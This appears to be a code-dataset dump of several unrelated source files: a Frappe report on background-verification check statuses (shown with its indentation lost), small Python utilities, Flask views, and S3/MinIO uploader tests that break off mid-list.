max_stars_repo_path (string, 3–269 chars) | max_stars_repo_name (string, 4–119 chars) | max_stars_count (int64, 0–191k) | id (string, 1–7 chars) | content (string, 6–1.05M chars) | score (float64, 0.23–5.13) | int_score (int64, 0–5)
---|---|---|---|---|---|---
bvs/background_verification/report/checks_status_report/checks_status_report.py | vhrspvl/vhrs-bvs | 1 | 3400 | # Copyright (c) 2013, VHRS and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe import _, msgprint
from frappe.utils import (cint, cstr, date_diff, flt, getdate, money_in_words,
nowdate, rounded, today)
from datetime import datetime
from datetime import date
import datetime
from calendar import monthrange
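# Frappe script-report entry point: execute(filters) must return (columns, data).
# For every applicant in the selected date range one row is built: the applicant
# details first, then one status cell per check enabled in its Checks Group
# (taken from the check document until allocation completes, afterwards from the
# corresponding "Verify ..." document, and "-" when the check is disabled).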
def execute(filters=None):
columns = get_columns()
data = []
row = []
applicant = applicants(filters)
for app in applicant:
row = [app.customer, app.ref_id, app.candidate_name,
app.in_date, app.status, app.checks_group]
if app.status != "Entry Pending":
cg = frappe.get_doc("Checks Group", app.checks_group)
if cg.employment_check1 == 1:
emp = frappe.get_doc("Employment Check1", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Employment Check1", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.employment_check2 == 1:
emp = frappe.get_doc("Employment Check2", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Employment Check2", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.employment_check3 == 1:
emp = frappe.get_doc("Employment Check3", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Employment Check3", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.employment_check4 == 1:
emp = frappe.get_doc("Employment Check4", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Employment Check4", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.education_check1 == 1:
if frappe.db.exists("Education Check1", {
"applicant_id": app.ref_id}):
emp = frappe.get_doc("Education Check1", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Education Check1", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.education_check2 == 1:
emp = frappe.get_doc("Education Check2", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Education Check2", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.education_check3 == 1:
emp = frappe.get_doc("Education Check3", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Education Check3", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.education_check4 == 1:
emp = frappe.get_doc("Education Check4", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Education Check4", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.address_check1 == 1:
emp = frappe.get_doc("Address Check1", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Address Check1", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.address_check2 == 1:
emp = frappe.get_doc("Address Check2", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Address Check2", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.address_check3 == 1:
emp = frappe.get_doc("Address Check3", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Address Check3", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.address_check4 == 1:
emp = frappe.get_doc("Address Check4", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Address Check4", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.family_check1 == 1:
emp = frappe.get_doc("Family Check1", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Family Check1", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.reference_check1 == 1:
emp = frappe.get_doc("Reference Check1", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Reference Check1", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.reference_check2 == 1:
emp = frappe.get_doc("Reference Check2", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Reference Check2", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.reference_check3 == 1:
emp = frappe.get_doc("Reference Check3", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Reference Check3", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.reference_check4 == 1:
emp = frappe.get_doc("Reference Check4", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Reference Check4", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.civil_check == 1:
emp = frappe.get_doc("Civil Check", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Civil Check", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.criminal_check == 1:
emp = frappe.get_doc("Criminal Check", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Criminal Check", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.id_check1 == 1:
emp = frappe.get_doc("ID Check1", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify ID Check1", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.id_check2 == 1:
emp = frappe.get_doc("ID Check2", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify ID Check2", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.id_check3 == 1:
emp = frappe.get_doc("ID Check3", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify ID Check3", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.id_check4 == 1:
emp = frappe.get_doc("ID Check4", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify ID Check4", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.id_check5 == 1:
emp = frappe.get_doc("ID Check5", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify ID Check5", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.id_check6 == 1:
emp = frappe.get_doc("ID Check6", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify ID Check6", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
data.append(row)
return columns, data
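# Frappe report columns are declared as "Label:Fieldtype[/Options]:Width" strings,
# e.g. "Project Name:Link/Customer:200" renders a 200px-wide link to a Customer record.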
def get_columns():
columns = [
_("Project Name") + ":Link/Customer:200",
_("VHRS Ref. No") + ":Data:150",
_("Candidate Name") + ":Data:180",
_("Start Date") + ":Date:150",
_("Status") + ":Data:150",
_("Checks Group Name") + ":Data:150",
_("Emp Check1 Status") + ":Data:150",
_("Emp Check2 Status") + ":Data:150",
_("Emp Check3 Status") + ":Data:150",
_("Emp Check4 Status") + ":Data:150",
_("Edu Check1 Status") + ":Data:150",
_("Edu Check2 Status") + ":Data:150",
_("Edu Check3 Status") + ":Data:150",
_("Edu Check4 Status") + ":Data:150",
_("Add Check1 Status") + ":Data:150",
_("Add Check2 Status") + ":Data:150",
_("Add Check3 Status") + ":Data:150",
_("Add Check4 Status") + ":Data:150",
_("Family Check Status") + ":Data:150",
_("Ref Check1 Status") + ":Data:150",
_("Ref Check2 Status") + ":Data:150",
_("Ref Check3 Status") + ":Data:150",
_("Ref Check4 Status") + ":Data:150",
_("Civil Check1 Status") + ":Data:150",
_("Criminal Check2 Status") + ":Data:150",
_("ID Check1 Status") + ":Data:150",
_("ID Check2 Status") + ":Data:150",
_("ID Check3 Status") + ":Data:150",
_("ID Check4 Status") + ":Data:150",
_("ID Check5 Status") + ":Data:150",
_("ID Check6 Status") + ":Data:150",
]
return columns
def applicants(filters):
applicant = frappe.db.sql(
"""select app.checks_group,app.customer,app.ref_id,app.candidate_name,app.in_date,app.status from `tabApplicant` app where
app.in_date between %(start_date)s and %(end_date)s order by app.in_date""", {
"start_date": filters.get("from_date"),
"end_date": filters.get("to_date")
}, as_dict=1)
return applicant
| 2.09375 | 2 |
dataset/dataset.py | TeamOfProfGuo/few_shot_baseline | 0 | 3401 | <filename>dataset/dataset.py
import os
DEFAULT_ROOT = './materials'
datasets_dt = {}
def register(name):
    def decorator(cls):
        datasets_dt[name] = cls
        return cls
    return decorator
def make(name, **kwargs):
    if kwargs.get('root_path') is None:
        kwargs['root_path'] = os.path.join(DEFAULT_ROOT, name)
    dataset = datasets_dt[name](**kwargs)
    return dataset
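# Minimal usage sketch (the dataset name and class below are hypothetical, not part of this repo):
#
#   @register('mini-imagenet')
#   class MiniImageNet:
#       def __init__(self, root_path, **kwargs):
#           self.root_path = root_path
#
#   ds = make('mini-imagenet')  # root_path defaults to ./materials/mini-imagenet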
| 2.515625 | 3 |
src/proto_formatter/syntax_parser.py | YiXiaoCuoHuaiFenZi/proto-formatter | 0 | 3402 | from .comment import CommentParser
from .protobuf import Protobuf
from .proto_structures import Syntax
class SyntaxParser:
    @classmethod
    def parse_and_add(cls, proto_obj: Protobuf, line, top_comment_list):
        if proto_obj.syntax is not None:
            raise ValueError('multiple syntax detected!')
        proto_obj.syntax = cls.parse_syntax(line, top_comment_list)
    @classmethod
    def parse_syntax(cls, line, top_comment_list):
        value = cls._get_syntax_value(line)
        comments = CommentParser.create_comment(line, top_comment_list)
        syntax = Syntax(value, comments)
        return syntax
    @classmethod
    def _get_syntax_value(cls, line):
        line = line.strip().replace(' ', '')
        lindex = len('syntax=')
        rindex = line.index(';')
        value = line[lindex:rindex].strip().replace('"', "").replace("'", "")
        return value
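# Example: for the line 'syntax = "proto3";' _get_syntax_value returns 'proto3'
# (whitespace and quotes stripped), which parse_syntax wraps in a Syntax object.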
| 2.640625 | 3 |
IPL/app/core/views.py | mgp-git/Flask | 0 | 3403 | <reponame>mgp-git/Flask<filename>IPL/app/core/views.py
from flask import render_template, request, Blueprint
core = Blueprint('core', __name__)
@core.route("/", methods=['GET', 'POST'])
def home():
return render_template('home.html')
@core.route("/about")
def about():
return render_template('about.html')
@core.route('/search', methods=['GET', 'POST'])
def search():
search_str = request.args.get('globalsearch')
return render_template('search.html', search_str=search_str)
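# Registration sketch (assumes an application factory elsewhere in the app package,
# which is not shown here):
#   from app.core.views import core
#   app.register_blueprint(core)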
| 2.0625 | 2 |
tests/test_s3.py | tdilauro/circulation-core | 1 | 3404 | <reponame>tdilauro/circulation-core
# encoding: utf-8
import functools
import os
from urllib.parse import urlsplit
import boto3
import botocore
import pytest
from botocore.exceptions import BotoCoreError, ClientError
from mock import MagicMock
from parameterized import parameterized
from ..mirror import MirrorUploader
from ..model import (
DataSource,
ExternalIntegration,
Hyperlink,
Identifier,
Representation,
create,
)
from ..s3 import (
MinIOUploader,
MinIOUploaderConfiguration,
MockS3Client,
MultipartS3Upload,
S3AddressingStyle,
S3Uploader,
S3UploaderConfiguration,
)
from ..testing import DatabaseTest
from ..util.datetime_helpers import datetime_utc, utc_now
class S3UploaderTest(DatabaseTest):
def _integration(self, **settings):
"""Create and configure a simple S3 integration."""
integration = self._external_integration(
ExternalIntegration.S3, ExternalIntegration.STORAGE_GOAL, settings=settings
)
integration.username = settings.get("username", "username")
integration.password = settings.get("password", "password")
return integration
def _add_settings_value(self, settings, key, value):
"""Adds a value to settings dictionary
:param settings: Settings dictionary
:type settings: Dict
:param key: Key
:type key: string
:param value: Value
:type value: Any
:return: Updated settings dictionary
:rtype: Dict
"""
if value:
if settings:
settings[key] = value
else:
settings = {key: value}
return settings
def _create_s3_uploader(
self,
client_class=None,
uploader_class=None,
region=None,
addressing_style=None,
**settings
):
"""Creates a new instance of S3 uploader
:param client_class: (Optional) Custom class to be used instead of boto3's client class
:type client_class: Optional[Type]
:param uploader_class: (Optional) Custom class which will be used instead of S3Uploader
:type uploader_class: Optional[Type]
:param region: (Optional) S3 region
:type region: Optional[string]
:param addressing_style: (Optional) S3 addressing style
:type addressing_style: Optional[string]
:param settings: Kwargs used for initializing an external integration
:type: Optional[Dict]
:return: New instance of S3 uploader
:rtype: S3Uploader
"""
settings = self._add_settings_value(
settings, S3UploaderConfiguration.S3_REGION, region
)
settings = self._add_settings_value(
settings, S3UploaderConfiguration.S3_ADDRESSING_STYLE, addressing_style
)
integration = self._integration(**settings)
uploader_class = uploader_class or S3Uploader
return uploader_class(integration, client_class=client_class)
class S3UploaderIntegrationTest(S3UploaderTest):
SIMPLIFIED_TEST_MINIO_ENDPOINT_URL = os.environ.get(
"SIMPLIFIED_TEST_MINIO_ENDPOINT_URL", "http://localhost:9000"
)
SIMPLIFIED_TEST_MINIO_USER = os.environ.get(
"SIMPLIFIED_TEST_MINIO_USER", "minioadmin"
)
SIMPLIFIED_TEST_MINIO_PASSWORD = os.environ.get(
"SIMPLIFIED_TEST_MINIO_PASSWORD", "<PASSWORD>"
)
_, SIMPLIFIED_TEST_MINIO_HOST, _, _, _ = urlsplit(
SIMPLIFIED_TEST_MINIO_ENDPOINT_URL
)
minio_s3_client = None
"""boto3 client connected to locally running MinIO instance"""
s3_client_class = None
"""Factory function used for creating a boto3 client inside S3Uploader"""
@classmethod
def setup_class(cls):
"""Initializes the test suite by creating a boto3 client set up with MinIO credentials"""
super(S3UploaderIntegrationTest, cls).setup_class()
cls.minio_s3_client = boto3.client(
"s3",
aws_access_key_id=TestS3UploaderIntegration.SIMPLIFIED_TEST_MINIO_USER,
aws_secret_access_key=TestS3UploaderIntegration.SIMPLIFIED_TEST_MINIO_PASSWORD,
endpoint_url=TestS3UploaderIntegration.SIMPLIFIED_TEST_MINIO_ENDPOINT_URL,
)
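# Both clients point at the locally running, S3-compatible MinIO endpoint:
# minio_s3_client lets the tests inspect buckets directly, while s3_client_class
# is injected into S3Uploader so its uploads land on the same server.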
cls.s3_client_class = functools.partial(
boto3.client,
endpoint_url=TestS3UploaderIntegration.SIMPLIFIED_TEST_MINIO_ENDPOINT_URL,
)
def teardown_method(self):
"""Deinitializes the test suite by removing all the buckets from MinIO"""
super(S3UploaderTest, self).teardown_method()
response = self.minio_s3_client.list_buckets()
for bucket in response["Buckets"]:
bucket_name = bucket["Name"]
response = self.minio_s3_client.list_objects(Bucket=bucket_name)
for object in response.get("Contents", []):
object_key = object["Key"]
self.minio_s3_client.delete_object(Bucket=bucket_name, Key=object_key)
self.minio_s3_client.delete_bucket(Bucket=bucket_name)
def _create_s3_uploader(
self,
client_class=None,
uploader_class=None,
region=None,
addressing_style=None,
**settings
):
"""Creates a new instance of S3 uploader
:param client_class: (Optional) Custom class to be used instead of boto3's client class
:type client_class: Optional[Type]
:param uploader_class: (Optional) Custom class which will be used instead of S3Uploader
:type uploader_class: Optional[Type]
:param region: (Optional) S3 region
:type region: Optional[string]
:param addressing_style: (Optional) S3 addressing style
:type addressing_style: Optional[string]
:param settings: Kwargs used for initializing an external integration
:type: Optional[Dict]
:return: New instance of S3 uploader
:rtype: S3Uploader
"""
if settings and "username" not in settings:
self._add_settings_value(
settings, "username", self.SIMPLIFIED_TEST_MINIO_USER
)
if settings and "password" not in settings:
self._add_settings_value(
settings, "password", self.SIMPLIFIED_TEST_MINIO_PASSWORD
)
if not client_class:
client_class = self.s3_client_class
return super(S3UploaderIntegrationTest, self)._create_s3_uploader(
client_class, uploader_class, region, addressing_style, **settings
)
class TestS3Uploader(S3UploaderTest):
def test_names(self):
# The NAME associated with this class must be the same as its
# key in the MirrorUploader implementation registry, and it's
# better if it's the same as the name of the external
# integration.
assert S3Uploader.NAME == ExternalIntegration.S3
assert (
S3Uploader == MirrorUploader.IMPLEMENTATION_REGISTRY[ExternalIntegration.S3]
)
def test_instantiation(self):
integration = self._external_integration(
ExternalIntegration.S3, goal=ExternalIntegration.STORAGE_GOAL
)
integration.username = "your-access-key"
integration.password = "<PASSWORD>"
integration.setting(
S3UploaderConfiguration.URL_TEMPLATE_KEY
).value = "a transform"
uploader = MirrorUploader.implementation(integration)
assert True == isinstance(uploader, S3Uploader)
# The URL_TEMPLATE_KEY setting becomes the .url_transform
# attribute on the S3Uploader object.
assert "a transform" == uploader.url_transform
@parameterized.expand(
[
("empty_credentials", None, None),
("empty_string_credentials", "", ""),
("non_empty_string_credentials", "username", "password"),
]
)
def test_initialization(self, name, username, password):
# Arrange
settings = {"username": username, "password": password}
integration = self._external_integration(
ExternalIntegration.S3,
goal=ExternalIntegration.STORAGE_GOAL,
settings=settings,
)
client_class = MagicMock()
# Act
S3Uploader(integration, client_class=client_class)
# Assert
assert client_class.call_count == 2
service_name = client_class.call_args_list[0].args[0]
region_name = client_class.call_args_list[0].kwargs["region_name"]
aws_access_key_id = client_class.call_args_list[0].kwargs["aws_access_key_id"]
aws_secret_access_key = client_class.call_args_list[0].kwargs[
"aws_secret_access_key"
]
config = client_class.call_args_list[0].kwargs["config"]
assert service_name == "s3"
assert region_name == S3UploaderConfiguration.S3_DEFAULT_REGION
assert aws_access_key_id == None
assert aws_secret_access_key == None
assert config.signature_version == botocore.UNSIGNED
assert (
config.s3["addressing_style"]
== S3UploaderConfiguration.S3_DEFAULT_ADDRESSING_STYLE
)
service_name = client_class.call_args_list[1].args[0]
region_name = client_class.call_args_list[1].kwargs["region_name"]
aws_access_key_id = client_class.call_args_list[1].kwargs["aws_access_key_id"]
aws_secret_access_key = client_class.call_args_list[1].kwargs[
"aws_secret_access_key"
]
assert service_name == "s3"
assert region_name == S3UploaderConfiguration.S3_DEFAULT_REGION
assert aws_access_key_id == (username if username != "" else None)
assert aws_secret_access_key == (password if password != "" else None)
assert "config" not in client_class.call_args_list[1].kwargs
def test_custom_client_class(self):
"""You can specify a client class to use instead of boto3.client."""
integration = self._integration()
uploader = S3Uploader(integration, MockS3Client)
assert isinstance(uploader.client, MockS3Client)
def test_get_bucket(self):
buckets = {
S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "banana",
S3UploaderConfiguration.BOOK_COVERS_BUCKET_KEY: "bucket",
}
buckets_plus_irrelevant_setting = dict(buckets)
buckets_plus_irrelevant_setting["not-a-bucket-at-all"] = "value"
uploader = self._create_s3_uploader(**buckets_plus_irrelevant_setting)
# This S3Uploader knows about the configured buckets. It
# wasn't informed of the irrelevant 'not-a-bucket-at-all'
# setting.
assert buckets == uploader.buckets
# get_bucket just does a lookup in .buckets
uploader.buckets["foo"] = object()
result = uploader.get_bucket("foo")
assert uploader.buckets["foo"] == result
@parameterized.expand(
[
(
"s3_url_with_path_without_slash",
"a-bucket",
"a-path",
"https://a-bucket.s3.amazonaws.com/a-path",
None,
),
(
"s3_dummy_url_with_path_without_slash",
"dummy",
"dummy",
"https://dummy.s3.amazonaws.com/dummy",
None,
),
(
"s3_path_style_url_with_path_without_slash",
"a-bucket",
"a-path",
"https://s3.amazonaws.com/a-bucket/a-path",
None,
S3AddressingStyle.PATH.value,
),
(
"s3_path_style_dummy_url_with_path_without_slash",
"dummy",
"dummy",
"https://s3.amazonaws.com/dummy/dummy",
None,
S3AddressingStyle.PATH.value,
),
(
"s3_url_with_path_with_slash",
"a-bucket",
"/a-path",
"https://a-bucket.s3.amazonaws.com/a-path",
None,
),
(
"s3_path_style_url_with_path_with_slash",
"a-bucket",
"/a-path",
"https://s3.amazonaws.com/a-bucket/a-path",
None,
S3AddressingStyle.PATH.value,
),
(
"s3_url_with_custom_region_and_path_without_slash",
"a-bucket",
"a-path",
"https://a-bucket.s3.us-east-2.amazonaws.com/a-path",
"us-east-2",
),
(
"s3_path_style_url_with_custom_region_and_path_without_slash",
"a-bucket",
"a-path",
"https://s3.us-east-2.amazonaws.com/a-bucket/a-path",
"us-east-2",
S3AddressingStyle.PATH.value,
),
(
"s3_url_with_custom_region_and_path_with_slash",
"a-bucket",
"/a-path",
"https://a-bucket.s3.us-east-3.amazonaws.com/a-path",
"us-east-3",
),
(
"s3_path_style_url_with_custom_region_and_path_with_slash",
"a-bucket",
"/a-path",
"https://s3.us-east-3.amazonaws.com/a-bucket/a-path",
"us-east-3",
S3AddressingStyle.PATH.value,
),
(
"custom_http_url_and_path_without_slash",
"http://a-bucket.com/",
"a-path",
"http://a-bucket.com/a-path",
None,
),
(
"custom_http_url_and_path_with_slash",
"http://a-bucket.com/",
"/a-path",
"http://a-bucket.com/a-path",
None,
),
(
"custom_http_url_and_path_without_slash",
"https://a-bucket.com/",
"a-path",
"https://a-bucket.com/a-path",
None,
),
(
"custom_http_url_and_path_with_slash",
"https://a-bucket.com/",
"/a-path",
"https://a-bucket.com/a-path",
None,
),
]
)
def test_url(
self, name, bucket, path, expected_result, region=None, addressing_style=None
):
# Arrange
uploader = self._create_s3_uploader(
region=region, addressing_style=addressing_style
)
# Act
result = uploader.url(bucket, path)
# Assert
assert result == expected_result
@parameterized.expand(
[
(
"implicit_s3_url_template",
"bucket",
"the key",
"https://bucket.s3.amazonaws.com/the%20key",
),
(
"implicit_s3_url_template_with_custom_region",
"bucket",
"the key",
"https://bucket.s3.us-east-2.amazonaws.com/the%20key",
None,
"us-east-2",
),
(
"explicit_s3_url_template",
"bucket",
"the key",
"https://bucket.s3.amazonaws.com/the%20key",
S3UploaderConfiguration.URL_TEMPLATE_DEFAULT,
),
(
"explicit_s3_url_template_with_custom_region",
"bucket",
"the key",
"https://bucket.s3.us-east-2.amazonaws.com/the%20key",
S3UploaderConfiguration.URL_TEMPLATE_DEFAULT,
"us-east-2",
),
(
"http_url_template",
"bucket",
"the këy",
"http://bucket/the%20k%C3%ABy",
S3UploaderConfiguration.URL_TEMPLATE_HTTP,
),
(
"https_url_template",
"bucket",
"the këy",
"https://bucket/the%20k%C3%ABy",
S3UploaderConfiguration.URL_TEMPLATE_HTTPS,
),
]
)
def test_final_mirror_url(
self, name, bucket, key, expected_result, url_transform=None, region=None
):
# Arrange
uploader = self._create_s3_uploader(region=region)
if url_transform:
uploader.url_transform = url_transform
# Act
result = uploader.final_mirror_url(bucket, key)
# Assert
if not url_transform:
assert (
S3UploaderConfiguration.URL_TEMPLATE_DEFAULT == uploader.url_transform
)
assert result == expected_result
def test_key_join(self):
"""Test the code used to build S3 keys from parts."""
parts = ["Gutenberg", b"Gutenberg ID", 1234, "Die Flügelmaus+.epub"]
assert (
"Gutenberg/Gutenberg%20ID/1234/Die%20Fl%C3%BCgelmaus%2B.epub"
== S3Uploader.key_join(parts)
)
@parameterized.expand(
[
(
"with_gutenberg_cover_generator_data_source",
"test-book-covers-s3-bucket",
DataSource.GUTENBERG_COVER_GENERATOR,
"https://test-book-covers-s3-bucket.s3.amazonaws.com/Gutenberg%20Illustrated/",
),
(
"with_overdrive_data_source",
"test-book-covers-s3-bucket",
DataSource.OVERDRIVE,
"https://test-book-covers-s3-bucket.s3.amazonaws.com/Overdrive/",
),
(
"with_overdrive_data_source_and_scaled_size",
"test-book-covers-s3-bucket",
DataSource.OVERDRIVE,
"https://test-book-covers-s3-bucket.s3.amazonaws.com/scaled/300/Overdrive/",
300,
),
(
"with_gutenberg_cover_generator_data_source_and_custom_region",
"test-book-covers-s3-bucket",
DataSource.GUTENBERG_COVER_GENERATOR,
"https://test-book-covers-s3-bucket.s3.us-east-3.amazonaws.com/Gutenberg%20Illustrated/",
None,
"us-east-3",
),
(
"with_overdrive_data_source_and_custom_region",
"test-book-covers-s3-bucket",
DataSource.OVERDRIVE,
"https://test-book-covers-s3-bucket.s3.us-east-3.amazonaws.com/Overdrive/",
None,
"us-east-3",
),
(
"with_overdrive_data_source_and_scaled_size_and_custom_region",
"test-book-covers-s3-bucket",
DataSource.OVERDRIVE,
"https://test-book-covers-s3-bucket.s3.us-east-3.amazonaws.com/scaled/300/Overdrive/",
300,
"us-east-3",
),
]
)
def test_cover_image_root(
self,
name,
bucket,
data_source_name,
expected_result,
scaled_size=None,
region=None,
):
# Arrange
uploader = self._create_s3_uploader(region=region)
data_source = DataSource.lookup(self._db, data_source_name)
# Act
result = uploader.cover_image_root(bucket, data_source, scaled_size=scaled_size)
# Assert
assert result == expected_result
@parameterized.expand(
[
(
"with_default_region",
"test-open-access-s3-bucket",
"https://test-open-access-s3-bucket.s3.amazonaws.com/",
),
(
"with_custom_region",
"test-open-access-s3-bucket",
"https://test-open-access-s3-bucket.s3.us-east-3.amazonaws.com/",
"us-east-3",
),
]
)
def test_content_root(self, name, bucket, expected_result, region=None):
# Arrange
uploader = self._create_s3_uploader(region=region)
# Act
result = uploader.content_root(bucket)
# Assert
assert result == expected_result
@parameterized.expand(
[
(
"s3_url",
"test-marc-s3-bucket",
"SHORT",
"https://test-marc-s3-bucket.s3.amazonaws.com/SHORT/",
),
(
"s3_url_with_custom_region",
"test-marc-s3-bucket",
"SHORT",
"https://test-marc-s3-bucket.s3.us-east-2.amazonaws.com/SHORT/",
"us-east-2",
),
("custom_http_url", "http://my-feed/", "SHORT", "http://my-feed/SHORT/"),
("custom_https_url", "https://my-feed/", "SHORT", "https://my-feed/SHORT/"),
]
)
def test_marc_file_root(
self, name, bucket, library_name, expected_result, region=None
):
# Arrange
uploader = self._create_s3_uploader(region=region)
library = self._library(short_name=library_name)
# Act
result = uploader.marc_file_root(bucket, library)
# Assert
assert result == expected_result
@parameterized.expand(
[
(
"with_identifier",
{S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "thebooks"},
"ABOOK",
"https://thebooks.s3.amazonaws.com/Gutenberg%20ID/ABOOK.epub",
),
(
"with_custom_extension",
{S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "thebooks"},
"ABOOK",
"https://thebooks.s3.amazonaws.com/Gutenberg%20ID/ABOOK.pdf",
"pdf",
),
(
"with_custom_dotted_extension",
{S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "thebooks"},
"ABOOK",
"https://thebooks.s3.amazonaws.com/Gutenberg%20ID/ABOOK.pdf",
".pdf",
),
(
"with_custom_data_source",
{S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "thebooks"},
"ABOOK",
"https://thebooks.s3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK.epub",
None,
DataSource.UNGLUE_IT,
),
(
"with_custom_title",
{S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "thebooks"},
"ABOOK",
"https://thebooks.s3.amazonaws.com/Gutenberg%20ID/ABOOK/On%20Books.epub",
None,
None,
"On Books",
),
(
"with_custom_extension_and_title_and_data_source",
{S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "thebooks"},
"ABOOK",
"https://thebooks.s3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/On%20Books.pdf",
".pdf",
DataSource.UNGLUE_IT,
"On Books",
),
(
"with_custom_extension_and_title_and_data_source_and_region",
{S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "thebooks"},
"ABOOK",
"https://thebooks.s3.us-east-3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/On%20Books.pdf",
".pdf",
DataSource.UNGLUE_IT,
"On Books",
"us-east-3",
),
(
"with_protected_access_and_custom_extension_and_title_and_data_source_and_region",
{S3UploaderConfiguration.PROTECTED_CONTENT_BUCKET_KEY: "thebooks"},
"ABOOK",
"https://thebooks.s3.us-east-3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/On%20Books.pdf",
".pdf",
DataSource.UNGLUE_IT,
"On Books",
"us-east-3",
False,
),
]
)
def test_book_url(
self,
name,
buckets,
identifier,
expected_result,
extension=None,
data_source_name=None,
title=None,
region=None,
open_access=True,
):
# Arrange
identifier = self._identifier(foreign_id=identifier)
uploader = self._create_s3_uploader(region=region, **buckets)
parameters = {"identifier": identifier, "open_access": open_access}
if extension:
parameters["extension"] = extension
if title:
parameters["title"] = title
if data_source_name:
data_source = DataSource.lookup(self._db, DataSource.UNGLUE_IT)
parameters["data_source"] = data_source
# Act
result = uploader.book_url(**parameters)
# Assert
assert result == expected_result
@parameterized.expand(
[
(
"without_scaled_size",
{S3UploaderConfiguration.BOOK_COVERS_BUCKET_KEY: "thecovers"},
DataSource.UNGLUE_IT,
"ABOOK",
"filename",
"https://thecovers.s3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/filename",
),
(
